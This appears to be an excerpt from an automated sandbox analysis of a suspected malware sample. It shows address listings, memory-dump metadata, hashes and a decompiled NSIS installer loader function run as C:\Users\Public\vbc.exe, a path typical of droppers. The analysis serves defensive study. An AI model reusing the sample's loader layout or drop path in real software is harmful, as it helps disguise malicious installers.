                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407177
                                                                                                                                                                                                              0x00406e56
                                                                                                                                                                                                              0x00406e59
                                                                                                                                                                                                              0x00406e5c
                                                                                                                                                                                                              0x00406e60
                                                                                                                                                                                                              0x00406e63
                                                                                                                                                                                                              0x00406e69
                                                                                                                                                                                                              0x00406e6b
                                                                                                                                                                                                              0x00406e6b
                                                                                                                                                                                                              0x00406e6b
                                                                                                                                                                                                              0x00406e6e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406c1c
                                                                                                                                                                                                              0x00406c1c
                                                                                                                                                                                                              0x00406c1f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f5b
                                                                                                                                                                                                              0x00406f5f
                                                                                                                                                                                                              0x00406f81
                                                                                                                                                                                                              0x00406f84
                                                                                                                                                                                                              0x00406f8e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f8e
                                                                                                                                                                                                              0x00406f61
                                                                                                                                                                                                              0x00406f64
                                                                                                                                                                                                              0x00406f68
                                                                                                                                                                                                              0x00406f6b
                                                                                                                                                                                                              0x00406f6b
                                                                                                                                                                                                              0x00406f6e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407018
                                                                                                                                                                                                              0x0040701c
                                                                                                                                                                                                              0x0040703a
                                                                                                                                                                                                              0x0040703a
                                                                                                                                                                                                              0x0040703a
                                                                                                                                                                                                              0x00407041
                                                                                                                                                                                                              0x00407048
                                                                                                                                                                                                              0x0040704f
                                                                                                                                                                                                              0x0040704f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040704f
                                                                                                                                                                                                              0x0040701e
                                                                                                                                                                                                              0x00407021
                                                                                                                                                                                                              0x00407024
                                                                                                                                                                                                              0x00407027
                                                                                                                                                                                                              0x0040702e
                                                                                                                                                                                                              0x00406f72
                                                                                                                                                                                                              0x00406f72
                                                                                                                                                                                                              0x00406f75
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407109
                                                                                                                                                                                                              0x0040710c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406d43
                                                                                                                                                                                                              0x00406d45
                                                                                                                                                                                                              0x00406d4c
                                                                                                                                                                                                              0x00406d4d
                                                                                                                                                                                                              0x00406d4f
                                                                                                                                                                                                              0x00406d52
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406d5a
                                                                                                                                                                                                              0x00406d5d
                                                                                                                                                                                                              0x00406d60
                                                                                                                                                                                                              0x00406d62
                                                                                                                                                                                                              0x00406d64
                                                                                                                                                                                                              0x00406d64
                                                                                                                                                                                                              0x00406d65
                                                                                                                                                                                                              0x00406d68
                                                                                                                                                                                                              0x00406d6f
                                                                                                                                                                                                              0x00406d72
                                                                                                                                                                                                              0x00406d80
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407056
                                                                                                                                                                                                              0x00407056
                                                                                                                                                                                                              0x00407059
                                                                                                                                                                                                              0x00407060
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407065
                                                                                                                                                                                                              0x00407065
                                                                                                                                                                                                              0x00407069
                                                                                                                                                                                                              0x004071a1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004071a1
                                                                                                                                                                                                              0x0040706f
                                                                                                                                                                                                              0x00407072
                                                                                                                                                                                                              0x00407075
                                                                                                                                                                                                              0x00407079
                                                                                                                                                                                                              0x0040707c
                                                                                                                                                                                                              0x00407082
                                                                                                                                                                                                              0x00407084
                                                                                                                                                                                                              0x00407084
                                                                                                                                                                                                              0x00407084
                                                                                                                                                                                                              0x00407087
                                                                                                                                                                                                              0x0040708a
                                                                                                                                                                                                              0x0040708a
                                                                                                                                                                                                              0x0040708a
                                                                                                                                                                                                              0x0040708a
                                                                                                                                                                                                              0x0040708d
                                                                                                                                                                                                              0x0040708d
                                                                                                                                                                                                              0x00407091
                                                                                                                                                                                                              0x004070f1
                                                                                                                                                                                                              0x004070f4
                                                                                                                                                                                                              0x004070f9
                                                                                                                                                                                                              0x004070fa
                                                                                                                                                                                                              0x004070fc
                                                                                                                                                                                                              0x004070fe
                                                                                                                                                                                                              0x00407101
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407101
                                                                                                                                                                                                              0x00407093
                                                                                                                                                                                                              0x00407099
                                                                                                                                                                                                              0x0040709c
                                                                                                                                                                                                              0x0040709f
                                                                                                                                                                                                              0x004070a2
                                                                                                                                                                                                              0x004070a5
                                                                                                                                                                                                              0x004070a8
                                                                                                                                                                                                              0x004070ab
                                                                                                                                                                                                              0x004070ae
                                                                                                                                                                                                              0x004070b1
                                                                                                                                                                                                              0x004070b4
                                                                                                                                                                                                              0x004070cd
                                                                                                                                                                                                              0x004070d0
                                                                                                                                                                                                              0x004070d3
                                                                                                                                                                                                              0x004070d6
                                                                                                                                                                                                              0x004070da
                                                                                                                                                                                                              0x004070dc
                                                                                                                                                                                                              0x004070dc
                                                                                                                                                                                                              0x004070dd
                                                                                                                                                                                                              0x004070e0
                                                                                                                                                                                                              0x004070b6
                                                                                                                                                                                                              0x004070b6
                                                                                                                                                                                                              0x004070be
                                                                                                                                                                                                              0x004070c3
                                                                                                                                                                                                              0x004070c5
                                                                                                                                                                                                              0x004070c8
                                                                                                                                                                                                              0x004070c8
                                                                                                                                                                                                              0x004070e3
                                                                                                                                                                                                              0x004070ea
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004070ec
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004070ec
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406d88
                                                                                                                                                                                                              0x00406d8b
                                                                                                                                                                                                              0x00406dc1
                                                                                                                                                                                                              0x00406ef1
                                                                                                                                                                                                              0x00406ef1
                                                                                                                                                                                                              0x00406ef1
                                                                                                                                                                                                              0x00406ef1
                                                                                                                                                                                                              0x00406ef4
                                                                                                                                                                                                              0x00406ef4
                                                                                                                                                                                                              0x00406ef7
                                                                                                                                                                                                              0x00406ef9
                                                                                                                                                                                                              0x00407183
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407183
                                                                                                                                                                                                              0x00406eff
                                                                                                                                                                                                              0x00406f02
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f08
                                                                                                                                                                                                              0x00406f0c
                                                                                                                                                                                                              0x00406f0f
                                                                                                                                                                                                              0x00406f0f
                                                                                                                                                                                                              0x00406f0f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f0f
                                                                                                                                                                                                              0x00406d8d
                                                                                                                                                                                                              0x00406d8f
                                                                                                                                                                                                              0x00406d91
                                                                                                                                                                                                              0x00406d93
                                                                                                                                                                                                              0x00406d96
                                                                                                                                                                                                              0x00406d97
                                                                                                                                                                                                              0x00406d99
                                                                                                                                                                                                              0x00406d9b
                                                                                                                                                                                                              0x00406d9e
                                                                                                                                                                                                              0x00406da1
                                                                                                                                                                                                              0x00406db7
                                                                                                                                                                                                              0x00406dbc
                                                                                                                                                                                                              0x00406df4
                                                                                                                                                                                                              0x00406df4
                                                                                                                                                                                                              0x00406df8
                                                                                                                                                                                                              0x00406e24
                                                                                                                                                                                                              0x00406e26
                                                                                                                                                                                                              0x00406e2d
                                                                                                                                                                                                              0x00406e30
                                                                                                                                                                                                              0x00406e33
                                                                                                                                                                                                              0x00406e33
                                                                                                                                                                                                              0x00406e38
                                                                                                                                                                                                              0x00406e38
                                                                                                                                                                                                              0x00406e3a
                                                                                                                                                                                                              0x00406e3d
                                                                                                                                                                                                              0x00406e44
                                                                                                                                                                                                              0x00406e47
                                                                                                                                                                                                              0x00406e74
                                                                                                                                                                                                              0x00406e74
                                                                                                                                                                                                              0x00406e77
                                                                                                                                                                                                              0x00406e7a
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00406e7c
                                                                                                                                                                                                              0x00406e82
                                                                                                                                                                                                              0x00406e85
                                                                                                                                                                                                              0x00406e88
                                                                                                                                                                                                              0x00406e8b
                                                                                                                                                                                                              0x00406e8e
                                                                                                                                                                                                              0x00406e91
                                                                                                                                                                                                              0x00406e94
                                                                                                                                                                                                              0x00406e97
                                                                                                                                                                                                              0x00406e9a
                                                                                                                                                                                                              0x00406e9d
                                                                                                                                                                                                              0x00406eb6
                                                                                                                                                                                                              0x00406eb8
                                                                                                                                                                                                              0x00406ebb
                                                                                                                                                                                                              0x00406ebc
                                                                                                                                                                                                              0x00406ebf
                                                                                                                                                                                                              0x00406ec1
                                                                                                                                                                                                              0x00406ec4
                                                                                                                                                                                                              0x00406ec6
                                                                                                                                                                                                              0x00406ec8
                                                                                                                                                                                                              0x00406ecb
                                                                                                                                                                                                              0x00406ecd
                                                                                                                                                                                                              0x00406ed0
                                                                                                                                                                                                              0x00406ed4
                                                                                                                                                                                                              0x00406ed6
                                                                                                                                                                                                              0x00406ed6
                                                                                                                                                                                                              0x00406ed7
                                                                                                                                                                                                              0x00406eda
                                                                                                                                                                                                              0x00406edd
                                                                                                                                                                                                              0x00406e9f
                                                                                                                                                                                                              0x00406e9f
                                                                                                                                                                                                              0x00406ea7
                                                                                                                                                                                                              0x00406eac
                                                                                                                                                                                                              0x00406eae
                                                                                                                                                                                                              0x00406eb1
                                                                                                                                                                                                              0x00406eb1
                                                                                                                                                                                                              0x00406ee0
                                                                                                                                                                                                              0x00406ee7
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406ee9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406ee9
                                                                                                                                                                                                              0x00406ee7
                                                                                                                                                                                                              0x00406dfa
                                                                                                                                                                                                              0x00406dfd
                                                                                                                                                                                                              0x00406dff
                                                                                                                                                                                                              0x00406e02
                                                                                                                                                                                                              0x00406e05
                                                                                                                                                                                                              0x00406e08
                                                                                                                                                                                                              0x00406e0a
                                                                                                                                                                                                              0x00406e0d
                                                                                                                                                                                                              0x00406e10
                                                                                                                                                                                                              0x00406e10
                                                                                                                                                                                                              0x00406e13
                                                                                                                                                                                                              0x00406e13
                                                                                                                                                                                                              0x00406e16
                                                                                                                                                                                                              0x00406e1d
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406e1f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406e1f
                                                                                                                                                                                                              0x00406e1d
                                                                                                                                                                                                              0x00406da3
                                                                                                                                                                                                              0x00406da6
                                                                                                                                                                                                              0x00406da8
                                                                                                                                                                                                              0x00406dab
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406c95
                                                                                                                                                                                                              0x00406c95
                                                                                                                                                                                                              0x00406c99
                                                                                                                                                                                                              0x0040715f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040715f
                                                                                                                                                                                                              0x00406c9f
                                                                                                                                                                                                              0x00406ca2
                                                                                                                                                                                                              0x00406ca5
                                                                                                                                                                                                              0x00406ca8
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406cad
                                                                                                                                                                                                              0x00406cb0
                                                                                                                                                                                                              0x00406cb3
                                                                                                                                                                                                              0x00406cb6
                                                                                                                                                                                                              0x00406cb9
                                                                                                                                                                                                              0x00406cbc
                                                                                                                                                                                                              0x00406cbd
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cc2
                                                                                                                                                                                                              0x00406cc5
                                                                                                                                                                                                              0x00406cc8
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406cce
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f12
                                                                                                                                                                                                              0x00406f12
                                                                                                                                                                                                              0x00406f12
                                                                                                                                                                                                              0x00406f16
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f1c
                                                                                                                                                                                                              0x00406f1f
                                                                                                                                                                                                              0x00406f22
                                                                                                                                                                                                              0x00406f25
                                                                                                                                                                                                              0x00406f27
                                                                                                                                                                                                              0x00406f27
                                                                                                                                                                                                              0x00406f27
                                                                                                                                                                                                              0x00406f2a
                                                                                                                                                                                                              0x00406f2d
                                                                                                                                                                                                              0x00406f30
                                                                                                                                                                                                              0x00406f33
                                                                                                                                                                                                              0x00406f36
                                                                                                                                                                                                              0x00406f39
                                                                                                                                                                                                              0x00406f3a
                                                                                                                                                                                                              0x00406f3c
                                                                                                                                                                                                              0x00406f3c
                                                                                                                                                                                                              0x00406f3c
                                                                                                                                                                                                              0x00406f3f
                                                                                                                                                                                                              0x00406f42
                                                                                                                                                                                                              0x00406f45
                                                                                                                                                                                                              0x00406f48
                                                                                                                                                                                                              0x00406f4b
                                                                                                                                                                                                              0x00406f4f
                                                                                                                                                                                                              0x00406f51
                                                                                                                                                                                                              0x00406f54
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f56
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f56
                                                                                                                                                                                                              0x00406f54
                                                                                                                                                                                                              0x00407189
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067b8

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
                                                                                                                                                                                                              • Instruction ID: 6d311f2402807b87ac493386ce59d8e56409eb9bb3693b5a24021ea98ba03221
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AF18571D04229CBDF28CFA8C8946ADBBB1FF44305F25816ED456BB281D3786A86CF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                                              			E00402EF1(void* __eflags, signed int _a4) {
                                                                                                                                                                                                              				DWORD* _v8;
                                                                                                                                                                                                              				DWORD* _v12;
                                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                                              				long _v20;
                                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                                                                              				signed int _v40;
                                                                                                                                                                                                              				char _v300;
                                                                                                                                                                                                              				long _t54;
                                                                                                                                                                                                              				void* _t57;
                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                              				intOrPtr _t65;
                                                                                                                                                                                                              				void* _t68;
                                                                                                                                                                                                              				intOrPtr* _t70;
                                                                                                                                                                                                              				long _t82;
                                                                                                                                                                                                              				signed int _t89;
                                                                                                                                                                                                              				intOrPtr _t92;
                                                                                                                                                                                                              				long _t94;
                                                                                                                                                                                                              				void* _t102;
                                                                                                                                                                                                              				void* _t106;
                                                                                                                                                                                                              				long _t107;
                                                                                                                                                                                                              				long _t110;
                                                                                                                                                                                                              				void* _t111;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t94 = 0;
                                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                                              				_v12 = 0;
                                                                                                                                                                                                              				 *0x424750 = GetTickCount() + 0x3e8;
                                                                                                                                                                                                              				GetModuleFileNameA(0, "C:\\Users\\Public\\vbc.exe", 0x400);
                                                                                                                                                                                                              				_t106 = E00405DC1("C:\\Users\\Public\\vbc.exe", 0x80000000, 3);
                                                                                                                                                                                                              				 *0x40a018 = _t106;
                                                                                                                                                                                                              				if(_t106 == 0xffffffff) {
                                                                                                                                                                                                              					return "Error launching installer";
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				E00406228("C:\\Users\\Public", "C:\\Users\\Public\\vbc.exe");
                                                                                                                                                                                                              				E00406228(0x42c000, E00405C07("C:\\Users\\Public"));
                                                                                                                                                                                                              				_t54 = GetFileSize(_t106, 0);
                                                                                                                                                                                                              				 *0x41f908 = _t54;
                                                                                                                                                                                                              				_t110 = _t54;
                                                                                                                                                                                                              				if(_t54 <= 0) {
                                                                                                                                                                                                              					L24:
                                                                                                                                                                                                              					E00402E52(1);
                                                                                                                                                                                                              					if( *0x424758 == _t94) {
                                                                                                                                                                                                              						goto L32;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_v12 == _t94) {
                                                                                                                                                                                                              						L28:
                                                                                                                                                                                                              						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                                                                                                                                                              						_t111 = _t57;
                                                                                                                                                                                                              						E00406756(0x40b870);
                                                                                                                                                                                                              						E00405DF0( &_v300, "C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
                                                                                                                                                                                                              						_t62 = CreateFileA( &_v300, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                                                                                                                                                                                                              						 *0x40a01c = _t62;
                                                                                                                                                                                                              						if(_t62 != 0xffffffff) {
                                                                                                                                                                                                              							_t65 = E00403419( *0x424758 + 0x1c);
                                                                                                                                                                                                              							 *0x41f90c = _t65;
                                                                                                                                                                                                              							 *0x41f900 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                                                                                                                                              							_t68 = E00403192(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                                                                                                                                                                                                              							if(_t68 == _v20) {
                                                                                                                                                                                                              								 *0x424754 = _t111;
                                                                                                                                                                                                              								 *0x42475c =  *_t111;
                                                                                                                                                                                                              								if((_v40 & 0x00000001) != 0) {
                                                                                                                                                                                                              									 *0x424760 =  *0x424760 + 1;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_t45 = _t111 + 0x44; // 0x44
                                                                                                                                                                                                              								_t70 = _t45;
                                                                                                                                                                                                              								_t102 = 8;
                                                                                                                                                                                                              								do {
                                                                                                                                                                                                              									_t70 = _t70 - 8;
                                                                                                                                                                                                              									 *_t70 =  *_t70 + _t111;
                                                                                                                                                                                                              									_t102 = _t102 - 1;
                                                                                                                                                                                                              								} while (_t102 != 0);
                                                                                                                                                                                                              								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x41f8fc;
                                                                                                                                                                                                              								E00405D7C(0x424780, _t111 + 4, 0x40);
                                                                                                                                                                                                              								return 0;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L32;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						return "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					E00403419( *0x41f8f8);
                                                                                                                                                                                                              					if(E00403403( &_a4, 4) == 0 || _v8 != _a4) {
                                                                                                                                                                                                              						goto L32;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						goto L28;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					do {
                                                                                                                                                                                                              						_t107 = _t110;
                                                                                                                                                                                                              						asm("sbb eax, eax");
                                                                                                                                                                                                              						_t82 = ( ~( *0x424758) & 0x00007e00) + 0x200;
                                                                                                                                                                                                              						if(_t110 >= _t82) {
                                                                                                                                                                                                              							_t107 = _t82;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(E00403403(0x4178f8, _t107) == 0) {
                                                                                                                                                                                                              							E00402E52(1);
                                                                                                                                                                                                              							L32:
                                                                                                                                                                                                              							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if( *0x424758 != 0) {
                                                                                                                                                                                                              							if((_a4 & 0x00000002) == 0) {
                                                                                                                                                                                                              								E00402E52(0);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						E00405D7C( &_v40, 0x4178f8, 0x1c);
                                                                                                                                                                                                              						_t89 = _v40;
                                                                                                                                                                                                              						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                                                                                                                                                                              							_a4 = _a4 | _t89;
                                                                                                                                                                                                              							 *0x424800 =  *0x424800 | _a4 & 0x00000002;
                                                                                                                                                                                                              							_t92 = _v16;
                                                                                                                                                                                                              							 *0x424758 =  *0x41f8f8;
                                                                                                                                                                                                              							if(_t92 > _t110) {
                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                                                                                                                                                              								_v12 = _v12 + 1;
                                                                                                                                                                                                              								_t110 = _t92 - 4;
                                                                                                                                                                                                              								if(_t107 > _t110) {
                                                                                                                                                                                                              									_t107 = _t110;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								break;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						L20:
                                                                                                                                                                                                              						if(_t110 <  *0x41f908) {
                                                                                                                                                                                                              							_v8 = E004066E8(_v8, 0x4178f8, _t107);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						 *0x41f8f8 =  *0x41f8f8 + _t107;
                                                                                                                                                                                                              						_t110 = _t110 - _t107;
                                                                                                                                                                                                              					} while (_t110 != 0);
                                                                                                                                                                                                              					_t94 = 0;
                                                                                                                                                                                                              					goto L24;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}




























                                                                                                                                                                                                              0x00402efc
                                                                                                                                                                                                              0x00402eff
                                                                                                                                                                                                              0x00402f02
                                                                                                                                                                                                              0x00402f1c
                                                                                                                                                                                                              0x00402f21
                                                                                                                                                                                                              0x00402f34
                                                                                                                                                                                                              0x00402f39
                                                                                                                                                                                                              0x00402f3f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00402f41
                                                                                                                                                                                                              0x00402f52
                                                                                                                                                                                                              0x00402f63
                                                                                                                                                                                                              0x00402f6a
                                                                                                                                                                                                              0x00402f72
                                                                                                                                                                                                              0x00402f77
                                                                                                                                                                                                              0x00402f79
                                                                                                                                                                                                              0x00403064
                                                                                                                                                                                                              0x00403066
                                                                                                                                                                                                              0x00403072
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040307b
                                                                                                                                                                                                              0x004030a7
                                                                                                                                                                                                              0x004030ac
                                                                                                                                                                                                              0x004030b7
                                                                                                                                                                                                              0x004030b9
                                                                                                                                                                                                              0x004030ca
                                                                                                                                                                                                              0x004030e5
                                                                                                                                                                                                              0x004030ee
                                                                                                                                                                                                              0x004030f3
                                                                                                                                                                                                              0x00403112
                                                                                                                                                                                                              0x00403122
                                                                                                                                                                                                              0x00403134
                                                                                                                                                                                                              0x00403139
                                                                                                                                                                                                              0x00403141
                                                                                                                                                                                                              0x0040314e
                                                                                                                                                                                                              0x00403156
                                                                                                                                                                                                              0x0040315b
                                                                                                                                                                                                              0x0040315d
                                                                                                                                                                                                              0x0040315d
                                                                                                                                                                                                              0x00403165
                                                                                                                                                                                                              0x00403165
                                                                                                                                                                                                              0x00403168
                                                                                                                                                                                                              0x00403169
                                                                                                                                                                                                              0x00403169
                                                                                                                                                                                                              0x0040316c
                                                                                                                                                                                                              0x0040316e
                                                                                                                                                                                                              0x0040316e
                                                                                                                                                                                                              0x00403178
                                                                                                                                                                                                              0x00403184
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403189
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403141
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004030f5
                                                                                                                                                                                                              0x00403083
                                                                                                                                                                                                              0x00403095
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00402f7f
                                                                                                                                                                                                              0x00402f84
                                                                                                                                                                                                              0x00402f89
                                                                                                                                                                                                              0x00402f8d
                                                                                                                                                                                                              0x00402f94
                                                                                                                                                                                                              0x00402f9b
                                                                                                                                                                                                              0x00402f9d
                                                                                                                                                                                                              0x00402f9d
                                                                                                                                                                                                              0x00402fa8
                                                                                                                                                                                                              0x00403101
                                                                                                                                                                                                              0x00403143
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403143
                                                                                                                                                                                                              0x00402fb5
                                                                                                                                                                                                              0x00403035
                                                                                                                                                                                                              0x00403039
                                                                                                                                                                                                              0x0040303e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403035
                                                                                                                                                                                                              0x00402fbe
                                                                                                                                                                                                              0x00402fc3
                                                                                                                                                                                                              0x00402fcb
                                                                                                                                                                                                              0x00402ff1
                                                                                                                                                                                                              0x00403000
                                                                                                                                                                                                              0x00403006
                                                                                                                                                                                                              0x0040300b
                                                                                                                                                                                                              0x00403011
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040301b
                                                                                                                                                                                                              0x00403023
                                                                                                                                                                                                              0x00403026
                                                                                                                                                                                                              0x0040302b
                                                                                                                                                                                                              0x0040302d
                                                                                                                                                                                                              0x0040302d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040301b
                                                                                                                                                                                                              0x0040303f
                                                                                                                                                                                                              0x00403045
                                                                                                                                                                                                              0x00403051
                                                                                                                                                                                                              0x00403051
                                                                                                                                                                                                              0x00403054
                                                                                                                                                                                                              0x0040305a
                                                                                                                                                                                                              0x0040305a
                                                                                                                                                                                                              0x00403062
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403062

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32(76712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00402F05
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\vbc.exe,00000400), ref: 00402F21
                                                                                                                                                                                                                • Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405DC5
                                                                                                                                                                                                                • Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00402F6A
                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,0040A130), ref: 004030AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
